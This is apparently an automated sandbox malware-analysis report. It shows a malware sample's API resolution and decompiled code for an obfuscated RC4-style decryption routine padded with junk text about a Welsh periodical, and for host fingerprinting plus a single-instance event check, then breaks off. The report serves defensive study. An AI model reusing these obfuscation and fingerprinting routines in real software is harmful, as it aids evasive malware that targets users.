GetProcAddress.KERNEL32 ref: 0040F8A2
GetProcAddress.KERNEL32 ref: 0040F8B9
GetProcAddress.KERNEL32 ref: 0040F8D0
GetProcAddress.KERNEL32 ref: 0040F8E7
GetProcAddress.KERNEL32 ref: 0040F8FE
GetProcAddress.KERNEL32 ref: 0040F915
GetProcAddress.KERNEL32 ref: 0040F92C
GetProcAddress.KERNEL32 ref: 0040F943
GetProcAddress.KERNEL32 ref: 0040F95A
GetProcAddress.KERNEL32 ref: 0040F971
GetProcAddress.KERNEL32 ref: 0040F988
GetProcAddress.KERNEL32 ref: 0040F99F
GetProcAddress.KERNEL32 ref: 0040F9B6
GetProcAddress.KERNEL32 ref: 0040F9CD
GetProcAddress.KERNEL32 ref: 0040F9E4
GetProcAddress.KERNEL32 ref: 0040F9FB
GetProcAddress.KERNEL32 ref: 0040FA12
GetProcAddress.KERNEL32 ref: 0040FA29
GetProcAddress.KERNEL32 ref: 0040FA40
GetProcAddress.KERNEL32 ref: 0040FA57
GetProcAddress.KERNEL32 ref: 0040FA6E
GetProcAddress.KERNEL32 ref: 0040FA85
GetProcAddress.KERNEL32 ref: 0040FA9C
GetProcAddress.KERNEL32 ref: 0040FAB3
GetProcAddress.KERNEL32 ref: 0040FACA
GetProcAddress.KERNEL32 ref: 0040FAE1
GetProcAddress.KERNEL32 ref: 0040FAF8
GetProcAddress.KERNEL32 ref: 0040FB0F
GetProcAddress.KERNEL32 ref: 0040FB26
GetProcAddress.KERNEL32 ref: 0040FB3D
GetProcAddress.KERNEL32 ref: 0040FB54
LoadLibraryA.KERNEL32(0040D374), ref: 0040FB65
LoadLibraryA.KERNEL32 ref: 0040FB76
LoadLibraryA.KERNEL32 ref: 0040FB87
LoadLibraryA.KERNEL32 ref: 0040FB98
LoadLibraryA.KERNEL32 ref: 0040FBA9
LoadLibraryA.KERNEL32 ref: 0040FBBA
LoadLibraryA.KERNEL32 ref: 0040FBCB
GetProcAddress.KERNEL32(76130000), ref: 0040FBE6
GetProcAddress.KERNEL32 ref: 0040FBFD
GetProcAddress.KERNEL32 ref: 0040FC14
GetProcAddress.KERNEL32 ref: 0040FC2B
GetProcAddress.KERNEL32 ref: 0040FC42
GetProcAddress.KERNEL32(729C0000), ref: 0040FC61
GetProcAddress.KERNEL32 ref: 0040FC78
GetProcAddress.KERNEL32 ref: 0040FC8F
GetProcAddress.KERNEL32 ref: 0040FCA6
GetProcAddress.KERNEL32 ref: 0040FCBD
GetProcAddress.KERNEL32 ref: 0040FCD4
GetProcAddress.KERNEL32 ref: 0040FCEB
GetProcAddress.KERNEL32 ref: 0040FD02
GetProcAddress.KERNEL32(75EC0000), ref: 0040FD1D
GetProcAddress.KERNEL32 ref: 0040FD34
GetProcAddress.KERNEL32 ref: 0040FD4B
GetProcAddress.KERNEL32 ref: 0040FD62
GetProcAddress.KERNEL32 ref: 0040FD79
GetProcAddress.KERNEL32(731B0000), ref: 0040FD98
GetProcAddress.KERNEL32 ref: 0040FDAF
GetProcAddress.KERNEL32 ref: 0040FDC6
GetProcAddress.KERNEL32 ref: 0040FDDD
GetProcAddress.KERNEL32 ref: 0040FDF4
GetProcAddress.KERNEL32 ref: 0040FE0B
GetProcAddress.KERNEL32(762B0000), ref: 0040FE2A
GetProcAddress.KERNEL32 ref: 0040FE41
GetProcAddress.KERNEL32 ref: 0040FE58
GetProcAddress.KERNEL32 ref: 0040FE6F
GetProcAddress.KERNEL32 ref: 0040FE86
GetProcAddress.KERNEL32 ref: 0040FE9D
GetProcAddress.KERNEL32 ref: 0040FEB4
GetProcAddress.KERNEL32 ref: 0040FECB
GetProcAddress.KERNEL32(76170000), ref: 0040FEE6
GetProcAddress.KERNEL32 ref: 0040FEFD
GetProcAddress.KERNEL32 ref: 0040FF14
GetProcAddress.KERNEL32 ref: 0040FF2B
GetProcAddress.KERNEL32 ref: 0040FF42
GetProcAddress.KERNEL32(76B00000), ref: 0040FF5D
GetProcAddress.KERNEL32 ref: 0040FF74
GetProcAddress.KERNEL32(73970000), ref: 0040FF8F
GetProcAddress.KERNEL32 ref: 0040FFA6
GetProcAddress.KERNEL32(6E980000), ref: 0040FFC5
GetProcAddress.KERNEL32 ref: 0040FFDC
GetProcAddress.KERNEL32 ref: 0040FFF3
GetProcAddress.KERNEL32 ref: 0041000A
GetProcAddress.KERNEL32 ref: 00410021
GetProcAddress.KERNEL32 ref: 00410038
GetProcAddress.KERNEL32 ref: 0041004F
GetProcAddress.KERNEL32 ref: 00410066
GetProcAddress.KERNEL32(76CD0000), ref: 00410081
GetProcAddress.KERNEL32 ref: 00410098
GetProcAddress.KERNEL32 ref: 004100AF
GetProcAddress.KERNEL32 ref: 004100C6
GetProcAddress.KERNEL32(75750000), ref: 004100E1

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: f968f98f4d24a2928d5063b3303e7012114526da5e9724602dbb1e93aa3b4073
Instruction ID: 462d489e5739997e027931d175a1fa1fd6edf434e07338bc556c1ca65171fb87
Opcode Fuzzy Hash: f968f98f4d24a2928d5063b3303e7012114526da5e9724602dbb1e93aa3b4073
Instruction Fuzzy Hash: B832C875402A41EFDB025F60FD499E8FAA7F7983113ACF527E94B85670D73248A0AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00403310 Relevance: 123.4, APIs: 73, Strings: 9, Instructions: 431
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403310(intOrPtr* _a4, void** _a8) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v2036;
				intOrPtr _t153;
				void* _t221;
				void* _t244;
				void* _t286;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t317;
				signed int* _t318;
				char* _t327;
				signed int _t329;
				void* _t330;
				signed int _t333;
				intOrPtr* _t334;
				intOrPtr _t341;
				signed char _t343;
				signed int _t348;
				intOrPtr* _t353;
				signed int _t356;
				intOrPtr* _t357;
				intOrPtr _t361;
				char* _t364;
				void* _t366;

				_t153 =  *0x61527c; // 0x411c8c
				_v32 = _t153;
				memset( &_v2036, 0, 0x7d0);
				strcat( &_v2036, "The");
				strcat( &_v2036, "Greal");
				strcat( &_v2036, "(Llangollen)");
				strcat( &_v2036, "was");
				strcat( &_v2036, "a");
				strcat( &_v2036, "19th-century");
				strcat( &_v2036, "Welsh-language");
				strcat( &_v2036, "periodical");
				_t327 = "first";
				strcat( &_v2036, _t327);
				_t364 = "published";
				strcat( &_v2036, _t364);
				_v16 = _v16 & 0x00000000;
				strcat( &_v2036, "The");
				strcat( &_v2036, "Greal");
				strcat( &_v2036, "(Llangollen)");
				strcat( &_v2036, "was");
				strcat( &_v2036, "a");
				strcat( &_v2036, "19th-century");
				strcat( &_v2036, "Welsh-language");
				strcat( &_v2036, "periodical");
				strcat( &_v2036, _t327);
				strcat( &_v2036, _t364);
				_t348 = 0;
				_v8 = 0;
				_t329 = E0040EE9B(_v32);
				while(1) {
					 *(_t366 + _t348 * 4 - 0xbf0) = _t348;
					_v8 = _v8 + 1;
					 *(_t366 + _v8 * 4 - 0xff0) =  *(_t348 % _t329 + _v32) & 0x000000ff;
					if(_v8 >= 0x100) {
						break;
					}
					_t348 = _v8;
				}
				strcat( &_v2036, "The");
				strcat( &_v2036, "Greal");
				strcat( &_v2036, "(Llangollen)");
				strcat( &_v2036, "was");
				strcat( &_v2036, "a");
				strcat( &_v2036, "19th-century");
				strcat( &_v2036, "Welsh-language");
				strcat( &_v2036, "periodical");
				strcat( &_v2036, _t327);
				strcat( &_v2036, _t364);
				_t221 = 0;
				do {
					_t330 =  *((intOrPtr*)(_t366 + _t221 - 0xbf0));
					_v20 = _t330;
					_t333 = _t330 +  *((intOrPtr*)(_t366 + _t221 - 0xff0)) + _v16 & 0x800000ff;
					if(_t333 < 0) {
						_t333 = (_t333 - 0x00000001 | 0xffffff00) + 1;
					}
					_v16 = _t333;
					_t334 = _t366 + _t333 * 4 - 0xbf0;
					_v24 = _t334;
					 *((intOrPtr*)(_t366 + _t221 - 0xbf0)) =  *_t334;
					_t221 = _t221 + 4;
					 *_v24 = _v20;
				} while (_t221 < 0x400);
				strcat( &_v2036, "The");
				strcat( &_v2036, "Greal");
				strcat( &_v2036, "(Llangollen)");
				strcat( &_v2036, "was");
				strcat( &_v2036, "a");
				strcat( &_v2036, "19th-century");
				strcat( &_v2036, "Welsh-language");
				strcat( &_v2036, "periodical");
				strcat( &_v2036, _t327);
				strcat( &_v2036, _t364);
				_t244 = malloc(E0040EE9B(_a4) + 1); // executed
				_v16 = _v16 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v20 = _t244;
				strcat( &_v2036, "The");
				strcat( &_v2036, "Greal");
				strcat( &_v2036, "(Llangollen)");
				strcat( &_v2036, "was");
				strcat( &_v2036, "a");
				strcat( &_v2036, "19th-century");
				strcat( &_v2036, "Welsh-language");
				strcat( &_v2036, "periodical");
				strcat( &_v2036, _t327);
				strcat( &_v2036, _t364);
				_t353 = _a4;
				_v8 = _v8 & 0x00000000;
				if(E0040EE9B(_t353) > 0) {
					_v12 = _t353;
					_v36 = _v20 - _t353;
					do {
						_t313 = _v28 + 0x00000001 & 0x800000ff;
						if(_t313 < 0) {
							_t313 = (_t313 - 0x00000001 | 0xffffff00) + 1;
						}
						_v28 = _t313;
						_t314 = _t366 + _t313 * 4 - 0xbf0;
						_t341 =  *_t314;
						_t356 = _v16 + _t341 & 0x800000ff;
						if(_t356 < 0) {
							_t356 = (_t356 - 0x00000001 | 0xffffff00) + 1;
						}
						_v16 = _t356;
						_t357 = _t366 + _t356 * 4 - 0xbf0;
						_v24 = _t357;
						 *_t314 =  *_t357;
						 *_v24 = _t341;
						_t317 =  *_t314 + _t341 & 0x800000ff;
						if(_t317 < 0) {
							_t317 = (_t317 - 0x00000001 | 0xffffff00) + 1;
						}
						_t343 =  *_v12;
						_t318 = _t366 + _t317 * 4 - 0xbf0;
						_t361 = _v12;
						if( *_t318 != (_t343 & 0x000000ff)) {
							 *(_v36 + _t361) =  *_t318 ^ _t343;
						} else {
							 *(_v36 + _t361) = _t343;
						}
						_v8 = _v8 + 1;
						_v12 = _v12 + 1;
					} while (_v8 < E0040EE9B(_a4));
				}
				strcat( &_v2036, "The");
				strcat( &_v2036, "Greal");
				strcat( &_v2036, "(Llangollen)");
				strcat( &_v2036, "was");
				strcat( &_v2036, "a");
				strcat( &_v2036, "19th-century");
				strcat( &_v2036, "Welsh-language");
				strcat( &_v2036, "periodical");
				strcat( &_v2036, _t327);
				strcat( &_v2036, _t364);
				_t286 = _v20;
				 *((char*)(_t286 + _v8)) = 0;
				 *_a8 = _t286;
				strcat( &_v2036, "The");
				strcat( &_v2036, "Greal");
				strcat( &_v2036, "(Llangollen)");
				strcat( &_v2036, "was");
				strcat( &_v2036, "a");
				strcat( &_v2036, "19th-century");
				strcat( &_v2036, "Welsh-language");
				strcat( &_v2036, "periodical");
				strcat( &_v2036, _t327);
				strcat( &_v2036, _t364);
				return memset( &_v2036, 0, 0x7d0);
			}

0x00403319
0x00403326
0x00403332
0x0040334a
0x00403358
0x00403366
0x00403374
0x00403382
0x00403390
0x0040339e
0x004033af
0x004033b1
0x004033be
0x004033c0
0x004033cd
0x004033cf
0x004033df
0x004033ed
0x004033fb
0x00403409
0x00403417
0x00403428
0x00403436
0x00403444
0x0040344e
0x00403458
0x0040345d
0x00403462
0x0040346a
0x00403471
0x00403471
0x00403488
0x00403492
0x00403499
0x00000000
0x00000000
0x0040346e
0x0040346e
0x004034a7
0x004034b5
0x004034c3
0x004034d1
0x004034df
0x004034ed
0x004034fb
0x00403509
0x00403516
0x00403520
0x00403525
0x00403527
0x00403527
0x0040352e
0x0040353b
0x00403541
0x0040354a
0x0040354a
0x0040354b
0x0040354e
0x00403555
0x0040355d
0x00403567
0x0040356a
0x0040356c
0x0040357f
0x0040358d
0x0040359b
0x004035a9
0x004035b7
0x004035c5
0x004035d3
0x004035e1
0x004035ee
0x004035f8
0x00403604
0x0040360a
0x0040360e
0x00403612
0x00403621
0x0040362f
0x0040363d
0x0040364b
0x00403659
0x00403667
0x00403678
0x00403686
0x00403690
0x0040369a
0x0040369c
0x0040369f
0x004036af
0x004036ba
0x004036bd
0x004036c0
0x004036c4
0x004036c9
0x004036d1
0x004036d1
0x004036d5
0x004036d8
0x004036df
0x004036e3
0x004036e9
0x004036f2
0x004036f2
0x004036f3
0x004036f6
0x004036fd
0x00403702
0x00403707
0x0040370d
0x00403712
0x0040371a
0x0040371a
0x0040371e
0x00403723
0x0040372c
0x0040372f
0x00403740
0x00403731
0x00403734
0x00403734
0x00403743
0x00403749
0x00403751
0x004036c0
0x00403766
0x00403774
0x00403782
0x00403790
0x0040379e
0x004037ac
0x004037ba
0x004037c8
0x004037d5
0x004037df
0x004037e1
0x004037e7
0x004037ee
0x004037fc
0x0040380a
0x00403818
0x00403826
0x00403834
0x00403842
0x00403853
0x00403861
0x0040386b
0x00403875
0x00403892

APIs

memset.MSVCRT ref: 00403332
strcat.MSVCRT(?,The), ref: 0040334A
strcat.MSVCRT(?,Greal), ref: 00403358
strcat.MSVCRT(?,(Llangollen)), ref: 00403366
strcat.MSVCRT(?,was), ref: 00403374
strcat.MSVCRT(?,00411C18), ref: 00403382
strcat.MSVCRT(?,19th-century), ref: 00403390
strcat.MSVCRT(?,Welsh-language), ref: 0040339E
strcat.MSVCRT(?,periodical), ref: 004033AF
strcat.MSVCRT(?,first), ref: 004033BE
strcat.MSVCRT(?,published), ref: 004033CD
strcat.MSVCRT(?,The), ref: 004033DF
strcat.MSVCRT(?,Greal), ref: 004033ED
strcat.MSVCRT(?,(Llangollen)), ref: 004033FB
strcat.MSVCRT(?,was), ref: 00403409
strcat.MSVCRT(?,00411C18), ref: 00403417
strcat.MSVCRT(?,19th-century), ref: 00403428
strcat.MSVCRT(?,Welsh-language), ref: 00403436
strcat.MSVCRT(?,periodical), ref: 00403444
strcat.MSVCRT(?,first), ref: 0040344E
strcat.MSVCRT(?,published), ref: 00403458
strcat.MSVCRT(?,The), ref: 004034A7
strcat.MSVCRT(?,Greal), ref: 004034B5
strcat.MSVCRT(?,(Llangollen)), ref: 004034C3
strcat.MSVCRT(?,was), ref: 004034D1
strcat.MSVCRT(?,00411C18), ref: 004034DF
strcat.MSVCRT(?,19th-century), ref: 004034ED
strcat.MSVCRT(?,Welsh-language), ref: 004034FB
strcat.MSVCRT(?,periodical), ref: 00403509
strcat.MSVCRT(?,first), ref: 00403516
strcat.MSVCRT(?,published), ref: 00403520
strcat.MSVCRT(?,The), ref: 0040357F
strcat.MSVCRT(?,Greal), ref: 0040358D
strcat.MSVCRT(?,(Llangollen)), ref: 0040359B
strcat.MSVCRT(?,was), ref: 004035A9
strcat.MSVCRT(?,00411C18), ref: 004035B7
strcat.MSVCRT(?,19th-century), ref: 004035C5
strcat.MSVCRT(?,Welsh-language), ref: 004035D3
strcat.MSVCRT(?,periodical), ref: 004035E1
strcat.MSVCRT(?,first), ref: 004035EE
strcat.MSVCRT(?,published), ref: 004035F8
malloc.MSVCRT ref: 00403604
strcat.MSVCRT(?,The), ref: 00403621
strcat.MSVCRT(?,Greal), ref: 0040362F
strcat.MSVCRT(?,(Llangollen)), ref: 0040363D
strcat.MSVCRT(?,was), ref: 0040364B
strcat.MSVCRT(?,00411C18), ref: 00403659
strcat.MSVCRT(?,19th-century), ref: 00403667
strcat.MSVCRT(?,Welsh-language), ref: 00403678
strcat.MSVCRT(?,periodical), ref: 00403686
strcat.MSVCRT(?,first), ref: 00403690
strcat.MSVCRT(?,published), ref: 0040369A
strcat.MSVCRT(?,The), ref: 00403766
strcat.MSVCRT(?,Greal), ref: 00403774
strcat.MSVCRT(?,(Llangollen)), ref: 00403782
strcat.MSVCRT(?,was), ref: 00403790
strcat.MSVCRT(?,00411C18), ref: 0040379E
strcat.MSVCRT(?,19th-century), ref: 004037AC
strcat.MSVCRT(?,Welsh-language), ref: 004037BA
strcat.MSVCRT(?,periodical), ref: 004037C8
strcat.MSVCRT(?,first), ref: 004037D5
strcat.MSVCRT(?,published), ref: 004037DF
strcat.MSVCRT(?,The), ref: 004037FC
strcat.MSVCRT(?,Greal), ref: 0040380A
strcat.MSVCRT(?,(Llangollen)), ref: 00403818
strcat.MSVCRT(?,was), ref: 00403826
strcat.MSVCRT(?,00411C18), ref: 00403834
strcat.MSVCRT(?,19th-century), ref: 00403842
strcat.MSVCRT(?,Welsh-language), ref: 00403853
strcat.MSVCRT(?,periodical), ref: 00403861
strcat.MSVCRT(?,first), ref: 0040386B
strcat.MSVCRT(?,published), ref: 00403875
memset.MSVCRT ref: 00403885

Strings

first, xrefs: 004033B1, 004033BC, 0040344C, 00403514, 004035EC, 0040368E, 004037D3, 00403863
(Llangollen), xrefs: 00403360, 004033F5, 004034BD, 00403595, 00403637, 0040377C, 00403812
19th-century, xrefs: 0040338A, 00403422, 004034E7, 004035BF, 00403661, 004037A6, 0040383C
The, xrefs: 00403344, 004033D9, 004034A1, 00403579, 0040361B, 00403760, 004037F6
Welsh-language, xrefs: 00403398, 0040342A, 004034F5, 004035CD, 00403672, 004037B4, 0040384D
published, xrefs: 004033C0, 004033CB, 00403456, 0040351E, 004035F6, 00403698, 004037DD, 00403873
periodical, xrefs: 004033A9, 0040343E, 00403503, 004035DB, 0040367A, 004037C2, 0040385B
Greal, xrefs: 00403352, 004033E7, 004034AF, 00403587, 00403629, 0040376E, 00403804
was, xrefs: 0040336E, 00403403, 004034CB, 004035A3, 00403645, 0040378A, 00403820

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$memset$malloc
String ID: (Llangollen)$19th-century$Greal$The$Welsh-language$first$periodical$published$was
API String ID: 2983066478-3955113164
Opcode ID: abdcd14befc98862949acb1ea619735bc6881040d46ef0765a6c43f5accb2248
Instruction ID: 9bbbf3ecd0c1f066a5e1976c3eccf1578e49b41c279d9f83d4d94e77ba5b6e6b
Opcode Fuzzy Hash: abdcd14befc98862949acb1ea619735bc6881040d46ef0765a6c43f5accb2248
Instruction Fuzzy Hash: 57E1E6B5D8421EAACB10DBA0DC45EEE7B7CEF44304F1404A7A609E3255E67CA7848FD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E355 Relevance: 85.9, APIs: 36, Strings: 13, Instructions: 193
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E0040E355() {
				char* _t49;
				void* _t83;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t102;
				char* _t141;
				void* _t143;
				char* _t146;
				void* _t156;
				void* _t162;
				struct _SECURITY_ATTRIBUTES* _t163;

				asm("sbb eax, [ecx]");
				strcat(_t49, ??);
				strcat(_t156 - 0x81c, "Greal");
				strcat(_t156 - 0x81c, "(Llangollen)");
				strcat(_t156 - 0x81c, "was");
				strcat(_t156 - 0x81c, "a");
				strcat(_t156 - 0x81c, "19th-century");
				strcat(_t156 - 0x81c, "Welsh-language");
				strcat(_t156 - 0x81c, "periodical");
				strcat(_t156 - 0x81c, "first");
				strcat(_t156 - 0x81c, "published");
				strcat(_t156 - 0x81c, "by");
				strcat(_t156 - 0x81c, "William");
				strcat(_t156 - 0x81c, "Williams");
				strcat(_t156 - 0x81c, _t141);
				strcat(_t156 - 0x81c, "Llangollen");
				strcat(_t156 - 0x81c, _t141);
				strcat(_t156 - 0x81c, _t146);
				_pop(_t143); // executed
				_t83 = E0040E8AD(_t143); // executed
				_t84 = E0040E8DF(_t143);
				E0041018C(E00410208(E00410208(E00410208(E00410208(E00410208(_t156 - 0xc, _t143, _t156 - 0x40, _t162,  *0x615470), _t143, _t156 - 0x28, _t162, "_"), _t143, _t156 - 0x4c, _t162, _t84), _t143, _t156 - 0x1c, _t162, "_"), _t143, _t156 - 0x34, _t162, _t83), _t143, _t156 - 0xc);
				E00401859( *((intOrPtr*)(_t156 - 0x34)));
				E00401859( *((intOrPtr*)(_t156 - 0x1c)));
				E00401859( *((intOrPtr*)(_t156 - 0x4c)));
				E00401859( *((intOrPtr*)(_t156 - 0x28)));
				E00401859( *((intOrPtr*)(_t156 - 0x40)));
				while(1) {
					_t102 = OpenEventA(0x1f0003, 0,  *(_t156 - 0xc));
					_t163 = _t102;
					if(_t163 == 0) {
						break;
					}
					CloseHandle(_t102);
					Sleep(0x1770);
				}
				 *((intOrPtr*)(_t156 - 0x10)) = CreateEventA(_t102, _t102, _t102,  *(_t156 - 0xc));
				strcat(_t156 - 0x81c, "The");
				strcat(_t156 - 0x81c, "Greal");
				strcat(_t156 - 0x81c, "(Llangollen)");
				strcat(_t156 - 0x81c, "was");
				strcat(_t156 - 0x81c, "a");
				strcat(_t156 - 0x81c, "19th-century");
				strcat(_t156 - 0x81c, "Welsh-language");
				strcat(_t156 - 0x81c, "periodical");
				strcat(_t156 - 0x81c, "first");
				strcat(_t156 - 0x81c, "published");
				strcat(_t156 - 0x81c, "by");
				strcat(_t156 - 0x81c, "William");
				strcat(_t156 - 0x81c, "Williams");
				strcat(_t156 - 0x81c, _t141);
				strcat(_t156 - 0x81c, "Llangollen");
				strcat(_t156 - 0x81c, _t141);
				strcat(_t156 - 0x81c, "1852");
				if(_t163 != 0 && _t163 == 0) {
				}
				E0040D9B7();
				_push("The");
			}

0x0040e355
0x0040e359
0x0040e367
0x0040e375
0x0040e383
0x0040e391
0x0040e39f
0x0040e3ad
0x0040e3bb
0x0040e3cc
0x0040e3da
0x0040e3e8
0x0040e3f6
0x0040e404
0x0040e40e
0x0040e41c
0x0040e426
0x0040e433
0x0040e436
0x0040e437
0x0040e443
0x0040e47e
0x0040e486
0x0040e48e
0x0040e496
0x0040e49e
0x0040e4a6
0x0040e4c4
0x0040e4ca
0x0040e4d0
0x0040e4d2
0x00000000
0x00000000
0x0040e4b3
0x0040e4be
0x0040e4be
0x0040e4e0
0x0040e4ef
0x0040e4fd
0x0040e50b
0x0040e519
0x0040e527
0x0040e535
0x0040e543
0x0040e551
0x0040e562
0x0040e570
0x0040e57e
0x0040e58c
0x0040e59a
0x0040e5a4
0x0040e5b2
0x0040e5bc
0x0040e5ce
0x0040e5d2
0x0040e5d2
0x0040e5d7
0x0040e5dc

APIs

strcat.MSVCRT(?,The), ref: 0040E359
strcat.MSVCRT(?,Greal), ref: 0040E367
strcat.MSVCRT(?,(Llangollen)), ref: 0040E375
strcat.MSVCRT(?,was), ref: 0040E383
strcat.MSVCRT(?,00411C18), ref: 0040E391
strcat.MSVCRT(?,19th-century), ref: 0040E39F
strcat.MSVCRT(?,Welsh-language), ref: 0040E3AD
strcat.MSVCRT(?,periodical), ref: 0040E3BB
strcat.MSVCRT(?,first), ref: 0040E3CC
strcat.MSVCRT(?,published), ref: 0040E3DA
strcat.MSVCRT(?,00411C5C), ref: 0040E3E8
strcat.MSVCRT(?,William), ref: 0040E3F6
strcat.MSVCRT(?,Williams), ref: 0040E404
strcat.MSVCRT(?,00411C74), ref: 0040E40E
strcat.MSVCRT(?,Llangollen), ref: 0040E41C
strcat.MSVCRT(?,00411C74), ref: 0040E426
strcat.MSVCRT(?,1852), ref: 0040E433

Part of subcall function 0040E8AD: GetProcessHeap.KERNEL32(00000000,00000104,76636410,?,?,004010CA,0040E259), ref: 0040E8B9
Part of subcall function 0040E8AD: RtlAllocateHeap.NTDLL(00000000), ref: 0040E8C0
Part of subcall function 0040E8AD: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E8D4

Part of subcall function 0040E8DF: GetProcessHeap.KERNEL32(00000000,00000104,76636410,?,?,004010B6,0040E259), ref: 0040E8EB
Part of subcall function 0040E8DF: RtlAllocateHeap.NTDLL(00000000), ref: 0040E8F2
Part of subcall function 0040E8DF: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E906

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

CloseHandle.KERNEL32(00000000), ref: 0040E4B3
Sleep.KERNEL32(00001770), ref: 0040E4BE
OpenEventA.KERNEL32(001F0003,00000000,?,00414048,00000000,00414048,00000000), ref: 0040E4CA
CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0040E4DA
strcat.MSVCRT(?,The), ref: 0040E4EF
strcat.MSVCRT(?,Greal), ref: 0040E4FD
strcat.MSVCRT(?,(Llangollen)), ref: 0040E50B
strcat.MSVCRT(?,was), ref: 0040E519
strcat.MSVCRT(?,00411C18), ref: 0040E527
strcat.MSVCRT(?,19th-century), ref: 0040E535
strcat.MSVCRT(?,Welsh-language), ref: 0040E543
strcat.MSVCRT(?,periodical), ref: 0040E551
strcat.MSVCRT(?,first), ref: 0040E562
strcat.MSVCRT(?,published), ref: 0040E570
strcat.MSVCRT(?,00411C5C), ref: 0040E57E
strcat.MSVCRT(?,William), ref: 0040E58C
strcat.MSVCRT(?,Williams), ref: 0040E59A
strcat.MSVCRT(?,00411C74), ref: 0040E5A4
strcat.MSVCRT(?,Llangollen), ref: 0040E5B2
strcat.MSVCRT(?,00411C74), ref: 0040E5BC
strcat.MSVCRT(?,1852), ref: 0040E5CE

Strings

first, xrefs: 0040E3C6, 0040E55C
Llangollen, xrefs: 0040E410, 0040E5AC
periodical, xrefs: 0040E3B5, 0040E54B
William, xrefs: 0040E3F0, 0040E586
(Llangollen), xrefs: 0040E36F, 0040E505
19th-century, xrefs: 0040E399, 0040E52F
1852, xrefs: 0040E431, 0040E5C1, 0040E5CC
The, xrefs: 0040E4E9
Welsh-language, xrefs: 0040E3A7, 0040E53D
published, xrefs: 0040E3D4, 0040E56A
Williams, xrefs: 0040E3FE, 0040E594
Greal, xrefs: 0040E361, 0040E4F7
was, xrefs: 0040E37D, 0040E513

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strcat$Heap$AllocateEventNameProcesslstrcpy$CloseComputerCreateHandleOpenSleepUserlstrcatlstrlen
String ID: (Llangollen)$1852$19th-century$Greal$Llangollen$The$Welsh-language$William$Williams$first$periodical$published$was
API String ID: 1625668111-3789696708
Opcode ID: 848b1f13e7956ac09d94e35c7b3cb06ec4b20528dcc7ec0fa07d9c84bf9de0fb
Instruction ID: 9075b5be7c5414df24d0c8160c14043d97c50f9a04d89b1b3e0d1055ae25f0e3
Opcode Fuzzy Hash: 848b1f13e7956ac09d94e35c7b3cb06ec4b20528dcc7ec0fa07d9c84bf9de0fb
Instruction Fuzzy Hash: 7451CDB6D8021CAACB20B7A5DD45ECE73FCAF44304F11C5B2E645F3055EA789A868F94

Uniqueness

Uniqueness Score: -1.00%

Function 00403F95 Relevance: 45.9, APIs: 22, Strings: 4, Instructions: 443
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

